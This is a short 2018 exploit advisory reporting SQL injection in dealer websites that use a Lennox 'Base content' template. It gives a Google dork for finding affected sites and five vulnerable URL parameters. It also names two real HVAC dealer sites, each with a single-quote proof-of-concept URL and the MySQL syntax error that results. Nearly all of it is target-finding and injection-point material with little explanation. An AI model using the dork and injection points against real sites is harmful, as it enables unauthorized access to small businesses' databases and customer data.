#################################################################################################
# Exploit Title : Base content Copyright ©2018 Lennox Industries USA SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
# Date : 29/05/2018
# Vendor Homepage : lennox.com / lennoxinternational.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
Company Name : Lennox: Heating & Cooling HVAC Systems Company
# Google Dork : intext:''Base content Copyright ©2018 Lennox Industries.''
# Exploit : /aboutus.php?id=[SQL Injection]
# Exploit : /product-list.php?cat=[SQL Injection]
# Exploit : /services.php?id=[SQL Injection]
# Exploit : /specials.php?id=[SQL Injection]
# Exploit : /resources.php?id=[SQL Injection]
#################################################################################################
# Example Site => mahaloheatingandairconditioning.com/aboutus.php?id=89%27 => [ Proof of Concept for SQL Injection ] => archive.is/jsQ4J
# Example Site => wayneshvac.com/aboutus.php?id=66%27 => [ Proof of Concept for SQL Injection ] => archive.is/I6bt5
# SQL/DB Error : Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''66'' or navigation.pagename = ''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################